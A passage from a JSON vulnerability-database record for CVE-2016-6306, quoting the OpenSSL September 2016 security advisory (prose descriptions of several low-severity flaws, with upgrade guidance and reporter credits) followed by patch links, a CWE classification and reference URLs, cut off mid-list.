parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-6306" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "BID", "id": "93153" }, { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-6306", "trust": 3.0 }, { "db": "BID", "id": "93153", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036885", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.1 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.1 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.1 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004992", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-6306", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148521", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148525", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148524", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "BID", "id": "93153" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "id": "VAR-201609-0592", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.39275403863636366 }, "last_update_date": "2024-07-04T21:32:12.934000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "hitachi-sec-2017-102", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-102/index.html" }, { "title": "HPSBGN03658", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05302448" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Security updates for all active release lines, September 2016", "trust": 0.8, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "title": "Fix small OOB reads.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=52e623c4cb06fffa9d5e75c60b34b4bc130b12e9" }, { "title": "Certificate message OOB reads (CVE-2016-6306)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "title": "SUSE-SU-2016:2470", "trust": 0.8, "url": "https://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "TLSA-2016-28", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-28j.html" }, { "title": "hitachi-sec-2017-102", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hitachi-sec-2017-102/index.html" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182187 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 7 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182185 - security advisory" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 RHEL 6 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20182186 - security advisory" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-6306" }, { "title": "Red Hat: CVE-2016-6306", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-6306" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6306 " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-125", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/93153" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2187" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2186" }, { "trust": 1.2, "url": "https://access.redhat.com/errata/rhsa-2018:2185" }, { "trust": 1.2, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "trust": 1.1, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.1, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036885" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.1, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.1, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.1, "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "trust": 1.1, "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "trust": 1.1, "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en\u0026docid=emr_na-hpesbhf03856en_us" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.1, "url": "https://support.f5.com/csp/article/k90492697" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.1, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00021.html" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-c05302448" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.1, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=52e623c4cb06fffa9d5e75c60b34b4bc130b12e9" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6306" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6306" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.4, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.3, "url": 